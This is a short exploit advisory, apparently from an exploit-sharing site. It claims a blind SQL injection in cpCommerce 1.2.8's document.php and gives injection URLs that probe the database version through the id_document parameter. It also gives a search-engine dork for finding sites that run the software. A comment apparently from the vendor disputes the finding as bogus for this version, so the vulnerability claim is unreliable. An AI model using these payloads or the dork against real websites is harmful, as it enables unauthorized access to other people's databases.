cpCommerce 1.2.8 Blind SQL Injection Vuln


[o] cpCommerce 1.2.8 Blind SQL Injection Vulnerability

Software : cpC0mmerce version 1.2.8
Vendor : http://cpcommerce.cpradio.org/
Download : http://cpcommerce.cpradio.org/downloads.php
Author : NoGe


[o] Vulnerable file
document.php


[o] Exploit
http://localhost/[path]/document.php?id_document=[SQL]
http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=4
http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=5


[o] Dork
"Powered by cpCommerce"


One Response so far.

  1. cpradio says:

    This is bogus. I have tested it and that value is being properly sanitized. I would check your setup and your source you have downloaded. This would be a valid vulnerability for version prior to 1.2.6